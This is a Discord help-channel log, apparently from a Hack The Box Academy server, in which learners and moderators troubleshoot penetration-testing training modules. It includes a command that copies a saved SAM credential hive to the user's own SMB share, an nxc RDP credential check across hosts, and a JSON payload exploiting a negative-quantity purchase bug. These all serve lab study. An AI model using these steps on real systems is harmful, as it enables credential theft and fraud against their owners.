@haughty furnace I know the module is focused on Burp Intruder which definitely has its uses, but ^^^^^ I would either try to move on to the next section to familiarize yourself with ZAP and try some wordlists with ZAP . Or you could try to familiarize yourself with FFUF and fuzz that way (FFUF is a tool you will use later on in the modules so ZAP would be easier to work with since the section is right after the BURP section.

within burpsuite you can just do the §sometext§.html

in intruder

¯_(ツ)_/¯

He was just having a tough time getting through the wordlists with the intruder buffering his speeds

meh the module was made with the limitation in mind tbh

@haughty furnace just keep messing around with wordlists just don't try anything too large but Marcie is right I believe I was able to get it in Intruder just can't remember the wordlist I used, sorry man

Anyone have any advice or tips on the ‘Password Attacks’ - ‘Introduction to John The Ripper’ module in the CPTS path, I have no idea where to start on using single-crack mode to crack r0lf’s password? I can’t find a user r0lf or any related files to r0lf and there’s no target to enumerate or dig into.

as i stated in #cpts; it's in the reading. you need to copy/paste the whole line given

it is in/around the same sub-heading that talks about single crack mode

Ok thanks!!

I looked at the instructions again but it’s still not making sense. I tried looking at the /usr and /bin, I can’t find r0lf

Any other tips??

it's not in /usr or /bin

the GECO (the info from /etc/passwd) is directly in the reading

Yeah but where do I find the passwd file? That’s my issue at the moment

you can create the file from the information in the reading

Ohhh right thank you that makes sense

to be more direct; it's literally the line after:

can i help you?

well this isn't #general :)

In the "Probing the Surface" section,
"What is the name of the user from the session captured in Sliver?"

Can anyone clarify exactly what part of the output is expected as the correct answer?

Which module

Intro to C2 Operations with Sliver

Done, thanks ...i think it was a space issue or something like that.

👍

still need help with this

Hi guys

Hi, welcome. Please read the #rules and follow the instructions in #welcome to gain access to a more appropriate channel like #general for greetings. This channel is dedicated toward the discussion of the various modules on HTB.

a quick search of the channel querying "base64 pfx" #modules message

HELLO! WINDOWS LATERAL MOVEMENTS - SKILLS ASSESSMENTS: Q2: when try to connect by rdp|| xfreerdp3 /d:inlanefreight /u:Arturo /p:'<HIDE>' /drive:.,linux /v:'[dead:beef:df::3]:43389' ERROR ❯ ping6 dead:beef:df::3
PING dead:beef:df::3 (dead:beef:df::3) 56 data bytes
--- dead:beef:df::3 ping statistics ---
17 packets transmitted, 0 received, 100% packet loss, time 16377ms use LIGOLO-NG|| THX!

if try from host PS C:\Users> ping -6 dead:beef:df::3
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)

OK, I'm a clown, I solved it with ipv4. 🤡

its been a month since you posted this and i'm stuck here, everything looks okay, what needs to be done to be "fully compliant"?

Hi, Im doing pivoting tunneling and port forwarding assessment, and made tunnel through ssh with -D and try to scan ip on 172.16.5.0/24 which I found earlier but all ports seems filtered. I'm using nmap with -Pn and -sT, tried with socks5 and socks4 but on both I have the same result.

#modules message

yeah that works, still not sure what specifically was wrong

maybe lockout duration, maybe password age who knows

that module is tier 2; please refrain from sharing stuff from it

if someone in the future gets stuck at "Weak Active Directory Password Policy" in "Active Directory Hardening", lockout duration of 15mins was the difference i think

there's no standards in the module so its just a guessing game

The solution to this module is bogus and not based on the module content or other best practices

This is why I am sharing the solution as it is just guesswork

it's still a tier 2 module, you can submit a post to #1234357888114364508 stating that the solution can't be inferred from any of the linked documentation

Ok

and if you find documentation that would be suitable, that'd be a great add to your post

The documentation is in the module

The skill assessment is just bogus

that's what i meant :) if the solution can't be garnered from the existing documentation then there's a missing link

The module teaches other than the skill assessment wants to

¯_(ツ)_/¯

There is no documentation on the solution wanted

As it is just bogus

I cannot link a documentation to bogus solutions

hii guys i need help regarding pass the certificate..i am unable to capture certificate from ntlmrelay...printerbuy is giving netbios timeout error

i'm also assuming you did gpupdate /force after setting the values

This is not the problem at all

why it showing error ?
2nd question : Question: Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?
https://academy.hackthebox.com/module/67/section/926

The problem is they want a setting which is against what is recommended by Microsoft and the module

And this is confirmed by it being part of the solution document available for annual gold users, as there is this bogus config shown as solution

I would tell you which config is wanted and bogus but you already deleted it twice

hi mod! do we have forum for module: LLM Output Attacks, Section: Exfiltration Attacks?

Hi guys hope you are doing well .
Need help in the module Android Fundamentals

there's no dedicated forums for the specific modules, just ask your question here, avoiding spoilers where possible

Guys can help me on Module 307: LLM Output Attacks, Section 3590? Specifically question 2 Im strunggling. Tried to do .html markdown and host it and use a python webserver to host the file for uploading but failing 😐 to get the history chat

need someone to help me 😐

@solar arch i just sanity checked and used only values referenced in the table in the "Other Initial account Access Weaknesses" Section; i ran gpupdate /force after

¯_(ツ)_/¯

Currently not at machine, maybe it already got fixed as I reported it on release day, don’t know, didn’t recheck, but multiple people already had the same problem in this channel. Also this specific config (against module recommendations) was (or is) part of the solution document

Will recheck when at home

was this finding 2 or 5?

5

@solar arch you mind sharing the solution doc in dms when you get home (if it matches what you remember at least being out of scope)? I'll double check what i have to be sure. I'm gonna be going to bed soon but def willing to see out any interesting discrepancies

(note i just mean for this particular part, maybe the solution was updated since you initially reported and now you'll look crazy)

No worries I’ll look crazy either way :p

Hi, I'm stuck there in the windows privesc section. Has someone found a successful exploit ?

Anyone done the "Introduction to Deserialization Attacks" module Skill Assessments II for some help please, regarding the ||recreation of the serialized cookie's hash.||

you can DM me

How many cubes for Cpts course ?

Hi guys,
I’m a beginner and I’m having trouble with the editor machine I’ve obtained Oliver’s credentials and the user flag but I’m having trouble excavating privileges

#1401229864647921734

I don’t have access to that channel

follow #welcome

thanks

running into double-hop troubles when trying to enumerate a target domain (cross-forest - from Windows section of AD enumeration module)

I can't run powerview commands due to the double-hop output:

Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server.

more specifically I cannot seem to run rubeus command at all. Running powershell as admin, the solution states this command will provide the hash but it doesn't. Any ideas?

The error:

[] Searching path 'LDAP://ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/DC=FREIGHTLOGISTICS,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=)(samAccountName=mssqlsvc)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[X] Error executing the domain searcher: A local error has occurred.

[X] LDAP query failed, try specifying more domain information or specific SPNs.

Does anyone mind helping me with this it's a linux fundamentals question "what is the last modified file in /var/backups

@novel matrix Do you know the answer ?

a specific command i have to use

i did ls -la to list everything about the files in /var/backups and it gave the date. i put the last made file in their and it doesn't work

@fathom pendant I am unable to chat in #general

You didn't connect your account

go to #welcome

In which section specifically are you trying this command?

Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

Taken from the module text (and then solution when that didnt work)

I'm trying to create a share with SMB server but it gives me this output. Can anyone tell me why it doesn't work?

Hi everyone, I can use some help on the module Pass The Certificate on obtaining the second flag

I am in the conditional module in the intro to bash scripting CJCA path, I have tried to solve the exercise by using this and the number I get by using my exegol environment is 30237 which is not accepted, I dont know what to do , what I am doing wrong? Using pwnbox I get 1197734 and stil doest work ```#!/bin/bash

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
var=$(echo $var | base64)

if [[ $counter -eq 35 ]]
then
    echo "${#var}"
    exit
fi

done```

just tried it on my end and it's working fine

I am using the RDP box provided, running the command as required and following the solution text, I've changed nothing and yet it doesn't work on my end and yours it does? xD

ive reset the box fresh and still it doesnt

nothing to do with the lab im using either since its the RDP box provided I am on. So idk

thanks for checking, idk what else I can possibly do.

Guys

Someone has hacks

Try changing VPN maybe that'll help

Someone bulling me

Guys Help me

annoyingly, another box reset and new vpn seemed to do the trick. No idea what tho

thanks

That's great!

Hi !
I'm doing the Bug Bounty Hunter course, and I'm stuck on a question
Skills Assessment - Using Web Proxies
The question : Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

I run Burp Intruder using the value of the encoded cookie as the request cookie, but I always get the same answer from the server and non of them seems to be the right one. Am I missing something ?

Thanks

hi guys

i can't solve http get module question

curl

hii anyone ready to help on pass the certificate? from password attacks..i am stuck here from last 5 hours

😂

@tiny solstice This is not a hacker for hire server. Please read #rules

lmao

Can someone pls answer ozeron? Thank you

Hi anyone complete this question its from Footprinting module SMB its been 5 days i tried everything but wrong flag

3.1

It's asking for banner
try with nmap

nc ip smb (port)

bro can you help me with pass the certificate?

🙏

ask here, let's see

it will fall into spoiler content

i sent you some ss in dm

pls have a look

Metasploit - framework module

section meterpreter

how to attack on the target

that's what they teach i guess

no i mean i have found the ports open

which service to attack there are five

i searched some through exploit but ain't worked

there are ton

okay at least which i need to search in msfconsole the version or service

so you expect company to tell you ...come on this port and hack us?

okay okay i understood bro

tell me here what to search
service : http
version : Microsoft ITS httpd 10.0

they teach quite good all these things

hello i hava some questions about android fundamental module.

i think you need to revisit that section

just ask

now there is no web app running so its no go

so i need to search from leftover ports?

Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test) i found build number sdk_gphone64_x86_64-userdebug 14 UE1A.230829.050 12077443 dev-keys but i don't succes to have a good format

these things are already taught in the modules

i think you are trying to hack somewebsite

and asking here steps

shall i give ss

it willbe better

then its just so dumb of you to ask i just go to htb website and took a ss and paste it here

how would it change

just send ss

you know what even more dumb thing is? having all in that content you need to solve..and still asking here step by step

here

that's what i am saying

hehe i am suspicious

tell me which to exploit

or how to narrow down

hello guys i have a question about this question of android fundamental module Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test) i found build number sdk_gphone64_x86_64-userdebug 14 UE1A.230829.050 12077443 dev-keys but i don't succes to have a good format

man you guys really have something with me

lets see how far i can reach

just re - read the convo

but that were step by step quesitons..like he studies nothing

how to search with searchsploit

that show with demo

my bad i even ask

i guess i need to change my passion to farming

without reading carefully and asking

then there is issue

i forgot the name of the tool which comes with metasloilt

msfvenom?

no

if we want to generate custom payloads msfvenom is for that purpose

okay thats helpful

(Noob here)... Question about modules in academy: When you filter at the top in modules section, there is an option for Tier 0, Tier 1, Tier 2... do these tiers refer to the tiers in HTB Labs? or does the tiers refer to something else?

tiers are in academy

they are ranked based on difficulty , and lvls

tier0 means for begginers

tier1 is after that

if you completed tier1 then go for tier 2

like this

@cunning canopy i am getting error in pass the certificiate

can you have a look if possible..

i am getting error..just have a look at the error

HI huys anyone can help me in Qustion for bash script?

yes ask

i cant send an screenshot for the problem

Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.

that question is in the intro of bash scripting / i creat the For loop and i have problem with pass this is the code exercise:#!/bin/bash

Decrypt function

function decrypt {
MzSaas7k=$(echo $hash | sed 's/988sn1/83unasa/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/4d298d/9999/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/3i8dqos82/873h4d/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/4n9Ls/20X/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/912oijs01/i7gg/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/k32jx0aa/n391s/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/nI72n/YzF1/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/82ns71n/2d49/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/JGcms1a/zIm12/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/MS9/4SIs/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/Ymxj00Ims/Uso18/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/sSi8Lm/Mit/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/9su2n/43n92ka/g')
Mzns7293sk=$(echo $MzSaas7k | sed 's/ggf3iunds/dn3i8/g')
MzSaas7k=$(echo $Mzns7293sk | sed 's/uBz/TT0K/g')

flag=$(echo $MzSaas7k | base64 -d | openssl enc -aes-128-cbc -a -d -salt -pass pass:$salt)

}

Variables

var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"

Base64 Encoding Example:

$ echo "Some Text" | base64

<- For-Loop here

Check if $salt is empty

if [[ ! -z "$salt" ]]
then
decrypt
echo $flag
else
exit 1
fi

hi guys i cannot find the flag

has anyone done paramtetric logic bug - PoC and Patching - Unexpected Input

i think i did it in a unintended method and wanna know what is intended method

||```{"cardId":"6894c1dcb2f1e2270ef3cf4f","items":[{"name":"-10000","category":"cubes","price":5,"amount":1.9}]} -> money becomes 1900 but since amount is used in iteration it cube becomes -10000

{"cardId":"6894c1dcb2f1e2270ef3cf4f","items":[{"name":"19000","category":"cubes","price":5,"amount":1}]} -> money becomes 0 and cube becomes 18000

but i dont think this was intended because cube requirement was so less

Which module

Hi, I'm trying to send files from a Windows machine to my machine but I always get this error. Can anyone help me?

give a folder name in remote machine

or atleast move C:\sam.save \\10.0.2.15\sam.save i guess

I already did it but it still doesn't work

Web request, http get request

in not sure but the exercise mention to search for flag but you searched for le?

yes

I don't post often but wanted to say that this module: Exploiting Web Vulnerabilities in Thick-Client Applications
https://academy.hackthebox.com/module/113/section/2164
Was pretty confusing. Not to take away from the lesson, which I think was really great.
Some things that would help:

1. Clarify Java compiling quirks. (explain that line numbers when using JDGUI in the .java files)
2. Specifically state the additional "import java.io.FileOutputStream" or at least mention code libraries.
3. More clarity with naming convention in examples, particularly the folder structures. Could be quite confusing to follow given the folder names in examples.

I also created the share with smbserver

I follow writing in the module

start an smb server on your machine and give full UNC path

change the le to flag @quartz ridge

specify share name too like this move C:\sam.save \\10.0.2.15\sharename\

Bro have time to look into this but not for my matter

Noted

Ohkk np but i just asking if you ever gone through that error

Thats what i was asking

Is it normal for there to be no wifi on the Windows machine?

ok

Oh , I will try this

Thanks I managed to copy the files

it is solve . thank you for help

Unrelated to a module, A realization I have come to is that beginners have no idea how bad their questions are. I remember first getting into tech a few years ago and I used to resent the responses I would get when I would come to forums like this. I honestly bet my questions were trash and the people were giving me solid advice I couldn't hear yet.

Has anyone seen where the link the PuTTY mention in the Pivoting, Tunneling, and Port Forwarding - SSH for Windows: plink.exe redirects to?

Hello all, I need some guidnace regarding machines and labs, when we complete a module they recommend us some machines down below. So my question is the machines recommended does only contain content from that module only, or they may include from various modules, second what are the labs then.

Where can I report the error?

Have you completed password attacks module?

Yea, I've managed to discover what I was missing

Ohh , i think it should come by googling as well

I'm not a fan of googling these exercises, I'm sure the answer is on the material provided and/or previous materials. So long this has been true

But i am stuck at password attacks

Zug zug

Can you help me out

Oh sorry, sure where are you at?

I have completed pivoting module

Pass the certificate

Give me 1 minute

Zig zap

Have you already managed to get jesse's flag?

jpinkman's

No

I am getting some error

Wait i will dm you the error

Kay

Sorry in the CAPE lateral movments skill assessments Q2 in the desktop of Arturo i dont find the flag. Why?

Did you move laterally?

Hello i am on module "credential hunting in Windows" https://academy.hackthebox.com/module/147/section/1318 i found the edge router username and password but i wasn't sure if I went about it the right way, i|| ran the GitBash on the desktop, and type in code, thinking it would give me the github code (which i found elsewhere)|| is there another way to go about getting the edge router credentials?

i need help with filter contents with the first question
on Linux fundamentals

What you need

I recommend breaking down your problem into small, easy to dissect questions. An example for your case would be, what kind of command can filter "contents", or what are contents? Then ask, how can I find out more infomration about these things to get my own answer.

but if none of that works, there is a ton of people in here with a lot of experience.

I recommend the first route, that will literally be your entire Tech career

just trust that the documentation (text file) is correct

there's a text file that contains the config; the "right way" is just whatever gets you the answer

hi,
I'm completely lost, they changed bloodhound.
Where can I find the summary table?
I can't count them by hand.

Active Directory Enumeration & Attacks

Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. (Submit the number as the answer)

All Kerberoastable Users

@polar raven i used the smb related exploit

yes that is the search result.
All Kerberoastable Users

on the old blood hound he gave a summary table.

it also gives me this error when I upload the files and if I remember correctly both sharphound and blodhound must be aligned with the versions, right?

spam@example.com 2025-08-07 21:39 GMT+2 (GMT+0200) 2025-08-07 21:39 GMT+2 (GMT+0200) 0 minutes Partially Complete 6 File(s) failed to ingest as JSON Content

Now I'll try from the attack box

Sometimes when you’re using a newer version of the collecting tool, it can cause trouble

you should be using the lateset sharphound if you're using the lateset bloodhound-ce

i just use the legacy version tbh; i don't care to use docker and stuff

Same here

Hello! May I have an hint for the HTTP Attacks - Log Injection section? I have no idea nor clue on how to bypass the WAF filter to obtain the RCE

Hey, I'm kinda stuck at
PIVOTING, TUNNELING, AND PORT FORWARDING -> RDP and SOCKS Tunneling with SocksOverRDP chapter.
I can't do a simple RDP to 172.16.5.19 from a pivot host, although solution clearly suggests to.
I tried restarting the pivot host, waiting 3-5 mins etc. and no luck.

Works only through tunnel socks, I did it at the beginning of the week.. had to be 172.16. 6 . x if i rember right

for privesc ?

yes

ok thx I will review again what I did

i believe this section is an a -> b -> c situation

a being the foothold and c being victor

you're missing the b portion, which is given in the reading

nvm i'm thinking backwards

try resetting the lab, changing vpn regions, reaching out to support

@polar raven since the module is above tier 0; i suggest not sharing it

thanks, will try that

as it would be a spoiler

yep sorry

as i said though i used the smb exploit in msfconsole

all good using the same old version, thanks

i pilfered the sharphound from one of the C:/tools/ from one of the targets

yeah but I was trying at it again by myself and it works. I don't understand exactly what SMB exploit because if you execute sherlock like in the module, i haven't any SMB exploit appaearing (I'm only readig my captures which arent' maybe complete)
Anyway, idi it

Working on CBBH Skill Assesment for info gathering web edition.

Did I just use the wrong command? I didn't get any hits off of this gobuster scan:

--append-domain

you may also need to add --domain inlanefreight.htb

i usually use Bloodhound.py on Docker to avoid any problems, I wanted to follow the write up

Ooohhh thank you

writeup is using legacy afaik

Is there an update to the HTTPS/TLS Attacks Poodle & Beast module when it comes to installing TLS-Breaker? I have JDK 11 installed but I'm running into TLS Breaker Common installation issues. Any idea how to fix this?

[ERROR] Failed to execute goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply (format) on project breaker-commons: Execution format of goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply failed: java.lang.reflect.InvocationTargetException: 'com.sun.tools.javac.tree.JCTree com.sun.tools.javac.tree.JCTree$JCImport.getQualifiedIdentifier()' -> [Help 1]
org.apache.maven.lifecycle.LifecycleExecutionException: Failed to execute goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply (format) on project breaker-commons: Execution format of goal com.diffplug.spotless:spotless-maven-plugin:2.27.2:apply failed: java.lang.reflect.InvocationTargetException

UPDATE: Figured it out by following instructions from this user #cwee message

if you're referring to the solution provided by the annual sub

no, I have the monthly self-renewal.
sorry I meant the module instructions not the write up

yay I got it! Thank you :D

how do i get the answer

Can happen last time i forget to add the domain to host file but now i wrote a tool for it

Is anyone able to help me out with the skills assessment for the Password Attacks module, I've made some progress but I'm stuck on the File server. I've been looking for an account that will give me RDP access to one of the other hosts but haven't made any progress there

Hey is there any Hack the Box module on python sandbox bypassing?

Sounds liike a dope module

Hello all, I need some guidnace regarding machines and labs, when we complete a module they recommend us some machines down below. So my question is the machines recommended does only contain content from that module only, or they may include from various modules, second what are the labs then.

You most likely wouldn't be able to use just what was covered in a module to solve a machine, but the content is applicable to the machine. Hope that makes sense.

You would want to ask in #1401229864647921734 and I wouldn't post content that could potentially be considered spoiling. If you are unable to post in that channel go to #welcome and perform the steps to get access to more channels on this server.

Oh sry 😦

need some help with the last question https://academy.hackthebox.com/module/112/section/1075

Rdp isnt always required

you know with the performance maintenace is it likely to affect some commands?

i tried ls to see everything but it just gave me nothing

This is better than if someone had answered it for you. I love that feeling.

The maintenance shouldnt effect anything if youre already connected to the machine, but the maintenance window is already over

oh i see just wanted to double check since ls didnt work but turned out be my slow wifi

If you got the first 2 questions, you should be able to get the third.

?

The steps you took to get those first 2 questions should mean the third is there too.

I bet it is

but I don't understand the questions and I don't wanna copy paste random stuff for the output and get lucky

I usually push the output into a file, then grep the file to find things.

sounds like a smart thing to do

but not when you don't know what to grep

It mentions a script, so I mean that can help.

can push snmpwalk it's never ending command

It can take a bit. You can also DM.

I mean alright let's say I push it

it's mentioning a script I need to find then use it and the output is the flag but how do I find this script

it's not like his name is script.py

nvm it's good

stupid question

Don't over think the keywords, think easy.

it's just the room doesn't explain what snmwalk does

It walks through the snmp logs

¯_(ツ)_/¯

It does mention what it does, and what the tool is enumerating is covered in the beginning of the section. There are also links you can navigate to, so you can read up more on the tool and protocol.

Module: bug bounty hunting process -> writing a good report. question number 1. tried all variations of A***** *****r, upper case, lower case, abbreviated as it is in the documentation, with parenthesis around it. is there a special format the answer needs to be in?

Try one word only

Was anybody having any issues with connection to boxes at around 6pm?

I was trying to connect to a machine on the soc path. Got it to work. Was trying to search using splunk. It would hang. Then I would ping. I would get nothing for 2 minutes and then boom. Ping would work and the page would load. Kept doing that over and over again. Didn’t have enough time to diagnose before I left.

still not working.

I am going through a module, doing well, and I have a question on something I nmap'd. When I scan port 2323, I get:

nmap -p2323 10.129.132.39
---
PORT     STATE SERVICE
2323/tcp open  3d-nfsd

But when I scann with -sV I get:

nmap -p2323 -sV 10.129.132.39
---
PORT     STATE SERVICE VERSION
2323/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

What is causing the name of the service to change, and why would it be from a version inspection flag?

Version scans do a bit more probing, otherwise nmap is doing "best guess"

Oh I see, because its running on a non-default port it ran with the "best guess" option

and the -sV gave it more information, hence the correct name

Yerp

Hello

Hi this isnt #general ; if youre wondering how to gain access i suggest reading and following the instructions in #welcome on linking your hackthebox account to discord

Ok

From Kali, I can only connect to RDP with IPV4 despite using Ligolo and adding IPV6 to the route. I can ping hosts with IPV6 from Kali, but I can't connect to RDP with either xfreerdp, xfreerdp3 or remmina. What am I doing wrong?

i try old message but don't work: xfreerdp /6 /d:inlanefreight.local /u:Arturo /p:'<REDACTED>' /w:2880 /h:1620 /dynamic-resolution/cert-ignore /drive:'backup',$PWD /port:43389 /v:[dead:beef:df::3]:43389 /timeout:99999

did you at least submit something?

a blank page or something

You at least need to submit something

even if its a blank pdf

if you submit nothing >> no 2nd attempt

but its best to just make the report as much as you can 🙂

you will get feedback on that too

Yeah thats good 🙂 you will get feedback on everything you submit

so 👍

Hello HTB team,

I’m facing a problem with the Android Fundamentals module — specifically the question:
“What is the name of the function that returns the string inside the cpp file?” (Format: FunctionName())

I have The answer and is the correct and standard native method name shown in all official examples and documentation. However, despite multiple attempts over several days, this answer is not being accepted or validated by the system.

This issue blocks progression in the module and is quite urgent. Could you please check if there is a bug with this question validation or provide guidance?

Thanks for your help!

@signal berry be mindful that even using ||spoiler text|| you'll still want to redact information like usernames and passwords; as anyone can still click on them

oops, sorry 😅

Hello, I need help in Active Directory Enumeration & Attacks - Privileged Access
in question it says find different user that CanPSRemote, I have tried everything but eachtime output gives only forend user
how can i found it?

Hello,
I need help with:
Module Name: Broken Authentication
Section Name: Authentication Bypass via Parameter Modification
Question you're struggling with: I fuzz the user_id parameter but I dont find the admin.

Thanks for your attention — I finally found the correct answer myself. It was a misunderstanding on my side. Sorry for the confusion!

Best regards.

im still stuck on Use what you learned in this section to find name of the user in the '/home' folder. What user did you find? for Bypassing Other Blacklisted Characters on https://academy.hackthebox.com/module/109/section/1037

well if you can acheive command injection it's as simple as finding a way to ls /home

bloodhound should find it; if you're looking for a way to discover it in powershell, you'll need to find a way to query the different potential systems i.e. academy-ea...

I have tried blood hound also, it save all computers as SID and not create connections

@spiral cove try lowercasing some of the letters; be careful not to spoil things from the module it's above tier 0 to my recollection

from what i recall what you're attempting should work

well SIDs are how windows communicates stuff

also make sure you're not missing anything by moving the window around

hey guys , can anyone help me with password attack skills assesment?

well i have put the proxy on firefox and the vpn to htb academy and the website doesnt load however, i can curl to the website from cli and burp picks up the intercept how ever, nothing i have tired works despite the code 200 return

@icy egret

is burp interceptor on? (that is a common reason it wouldn't 'load' as burp is still intercepting the request

ok, i turned it off and it works now but im still not getting the return from the command injections

I already got DMZ01 which i used username-anarchy and got JUMP01 RDP access. Then i am stuck looking for creds for next machine.

I still have FILE01 and DC01 to do

Hello

you're at the sharing is important step; snaffler is helpful

can i DM you?

from what i'm seeing your command should work

well they are not and this is the 3rd week i have been working on thins

this*

right, screw it, im done with this shit. im not paying for this anymore

send the request to repeater and edit in there

¯_(ツ)_/¯

dm me what you've got in your screenshots

because by all means it looks like it should work

spawned a fresh target and it works out the gate for me

copy/pasted your payload

i'll spawn a fresh target first and give it a try

for short payloads like this i like to send the request to repeater since i'm not needing to modify much of anything and it's easy to view the response

I know it but only give SID not any other information. I will try it again, also why they gave 2th machine. Mabie it is the source of my answer

dmed you

well one machine is the target, the other is an internal attack machine

iirc it's labeled Academy-EA-attack01

Thanks @fathom pendant after 3 weeks all it took was a fresh pair of eyes to see what mistake I had made. thanks for your help #BestModEver

i agree with
#BestMod

Try moving from a host you can access to another host using built-in tools/features, instead of trying to go from Kali to other hosts.

why is intro tier 0 module is medium but tier 2 module easy for same thing ?

/rank

dm me if you're still stuck

@open knoll please read #rules and #welcome this is useless

Hello, In the attacking common services -> Attacking ftp is the ftp port suppose to be closed

what are you getting ?

port closed?

Yes after running nmap -p-

It's not on the default port, scan all ports

I’m having this same problem. Did you figure this out?

About the module "Introduction To Digital Forensics", first question in "Practical Digital Forensics Scenario" (scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744).

I solved it, but I question my methodology.

What I did: dloaded the process mem dump to my vm and basically brute force searched it via strings. I checked all the commands that could be there (invoke,get, enum..) and finally got the result.

Is there a smarter way?

You're almost there. However, you need to look at the format that mentioned in the example
build_number-test

Look at the example Hello from C++ and try to figure out what method returns a string to the Java layer?

solved ? if not you can dm me

Hi i'm on the "Windows Fundamentals" trying to use the xfreerdp command and its just saying error

tried in my vm and on pwnbox

show error please

[06:37:14:493] [11637:11638] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[06:37:14:493] [11637:11638] [ERROR][com.freerdp.core] - failed to connect to 10.129.177.31

$ xfreerdp /v:<targetIp> /u:htb-student /p:Password

i used this command obviously replacing the placeholder names

switch to another vpn, maybe that'll help

can you ping the IP?

i just tried to changed the vpn and it terminated my instance and i cant reopen it

will this still work in my kali vm

surely right?

you mean the target ip?

i just used xfreerdp3 on my kali vm

instead of xfreerfp, same thing right?

just got a bunch of text saying

no RDP scancode found

hostname key changed

and loads of @@@@@@@@@@@@@@

and at the end asked do you trust the above certificate

is that it?

That's just the standard cert thing

/cert:ignore is usually thrown in

so put y

Yea

okay

thanks

idk why it wouldnt work in pwnboxbut would on my vm

yes

¯_(ツ)_/¯

weirdddd

at least im on now

and now im getting errors running the command to get the build number

Get-WmiObject -Class win32_OperatingSystem | select Version,BuildNumber

why doesn't this work

Are you running that in powershell or cmd

Hello people, I am stuck with the Password Attacks Skills Assessment module. I have exhausted available resources or at least as I see that. I have SMB creds that I was trying to use to spider through one of the systems shares, where I could find some other users and a bunch of useless files. My goal right now is to get access to a specific share which is interesting to us (the share that's mentioned in one of module's sections) and spider for creds there. Even though I tried bruteforcing with password list to get into smb dirs of other users, it was to no avail. I have spidered all existing files on shares for the user whose password I know and didn't find anything that could advance me.

i fixed it now sorry

you're right i may have been running it into cmd

just tried powwrshell and it wokred

its just in the desc it said cmdlet

so i assumed cmd

Ah no cmdlets are a powershell concept!

As a further note: blue background in the module example == powershell, black == cmd

got it

@terse bloom

If you're still on the foothold host and first set of creds: history is a great teacher

Ah, thanks

on the question to find flag file why do you go into the Academy directory. is it because pereflogs, programme files, etc. are classes as standard directory?

just wanna confirm so i'm not going down the qwrong path

Wait, by the first set of creds, do you mean the creds which are given on the HTB platform in the task itself?

Yes

Yes

thankssss

Well... I have already found a different set and everything I typed above was performed with the newly found set

Then snaffler is your friend

But you would need to get a shell for that? Whatever the creds I found I tested against all three hosts with remote control protocols... Which is basically why I'm stuck. I know that this guy that I found is a valid user due to kerbrute, however apparently he's not a part of a remote management group

nxc allows you to use a list for your hosts so you can check various protocols on various hosts

nxc rdp hosts.txt -u username -p password

Yep, that's what I did

Im also assuming you set up a pivot

yes, ligolo

The user should start with h

yep, that's the one i used for nxc

Im not available to sanity check but he should be able to connect to a machine

Well, funny thing is that the nxc is probably "false positiving", it's saying [+], but in reality, I use the remote commands to actually connect and nothing

Idk if that's the thing for this task, but I definitely had that happen in CTF machines

Should be able to connect to jump01 with rdp

Also make sure you're putting in the username correctly

I have tried that before, it didn't work, now I retried with -d flag for nxc and it works...

Thanks, I thought I was gonna go insane.

@fathom pendant
Hi sorry to ping but can we dm i wanna ask u womething

Something

I won't respond for a few hours. So if it's related to moderation, its best to ask another mod

Ok ok ty

When it comes to moderation, feel free to contact me.

I am doing the Cracking Passwords with Hashcat module, but I am getting stuck cracking the common password page. I am cracking 7106812752615cdfe427e01b98cd4083 which (through hashid) gives me:
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x
ofc I am not going to try all of these so I am trying the low-hanging ones like MD5 and NTLM but no luck so far. I am trying different default rulesets but esp if I have to hybrid this out I'll be running these for like hours and I think I am missing something

Any ideas/hints?

Also am I using hashid wrong? because this amount of output really doesn't help me with anything much.
Currently I just do:
hashid '7106812752615cdfe427e01b98cd4083'

hashid -m '<HASH HERE>'

Yeah I mean that gives me the modes, still useful, I was looking them up on the hashcat example hash list, ty.
It leaves me with the main problem though 😢

which wordlist you using? I usually do rockyou with an -a 0

In modules usually use rockyou or the wordlist provided if they have one

